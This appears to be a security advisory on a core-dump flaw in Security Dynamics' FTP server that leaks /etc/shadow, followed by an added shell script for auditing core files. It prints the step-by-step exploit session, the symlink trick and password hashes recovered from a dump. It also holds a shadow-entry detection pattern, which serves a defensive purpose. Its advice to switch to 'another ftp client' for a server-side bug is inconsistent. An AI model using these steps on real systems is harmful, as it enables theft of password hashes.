COMMAND

    ftp

SYSTEMS AFFECTED

    Systems running Security Dynamics' FTP server (Version 2.2)

PROBLEM

    sp00n found the following.  This bug is similar to the Solaris and
    other ftp core dump bugs, though slightly different.  BTW, the
    machine is a SPARC 20 running 2.5.  You can link files and clobber
    them with a core to annoy your local sys admin or, even better, get
    /etc/shadow, etc.  For example:

    220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
    Name (.:joeuser): joeuser
    331 Password required for mpotter.
    Password:
    230 User joeuser logged in.
    ftp> cd /tmp
    250 CWD command successful.
    ftp> user root DUMP_CORE_FTPD
    331 Password required for root.
    530 Login incorrect.
    Login failed.
    ftp> quote pasv
    421 Service not available, remote server has closed connection
    ftp> quit
    $ ls -la core
    -rw-r-----   1 root     network   264656 Nov 12 11:14 core

    At least it doesn't dump 666 like Solaris's in.ftpd.  If you have
    no read permission for group, what then?  Well, prior to dumping
    the core, link it to ps_data or something like that, and you will
    get this:

    lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
    -rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

    $file ps_data
    ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

    $strings core | more

    noaccess:*LK*:6445::::::
    sp00n:o.IZGdC5eBTtKY:10175:7:28::::
    root:aiqzotPNtTsI:9988::::::
    user2:U6d5srjcJi/KU:9952::::::
    joeuser:ktxVoVPQVIgc.:10175:7:28::::
    root::0:root
    other::1:
    bin::2:root,daemon
    sys::3:root,bin,adm
    adm::4:root,daemon
    uucp::5:root

SOLUTION

    Disable ftp, since this bug can do a lot.  A patch should be
    released soon.  Until then, it is recommended to switch to another
    ftp client.
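
    Until a patch is installed, an administrator can sweep writable
    directories for the two conditions shown in the session above.  The
    script below is an added example, not part of the original advisory
    or the vendor's software; the names audit_cores and shadow_lines and
    the SYMLINK/READABLE/SHADOW labels are hypothetical.

```shell
#!/bin/sh
# Added example (not from the advisory): audit a directory tree for the
# core-dump conditions shown in the session above.

# Shadow-style entry: name:hash:lastchg:min:max:... as in the strings output.
SHADOW_RE='^[A-Za-z_][A-Za-z0-9_.-]*:[^:]*:[0-9]+:[0-9]*:[0-9]*:'

# Count shadow-style lines in a binary file, like `strings | grep -c`.
shadow_lines() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | grep -Ec "$SHADOW_RE" || true
}

# Print one finding per line for every path named "core" under $1.
audit_cores() {
    # A symlink named core redirects the next dump into its target.
    find "$1" -name core -type l -print | while IFS= read -r p; do
        echo "SYMLINK $p"
    done
    # -L follows such links, so the dump is inspected wherever it landed.
    find -L "$1" -name core -type f -print | while IFS= read -r p; do
        # Group- or world-readable dump (mode checked on the link target).
        if [ -n "$(find -L "$p" \( -perm -040 -o -perm -004 \) -print)" ]; then
            echo "READABLE $p"
        fi
        n=$(shadow_lines "$p")
        if [ "$n" -gt 0 ]; then
            echo "SHADOW $p $n"
        fi
    done
}

# Usage: audit_cores /tmp
```

    Any SHADOW finding means the password hashes in that dump should be
    treated as disclosed and the affected passwords changed.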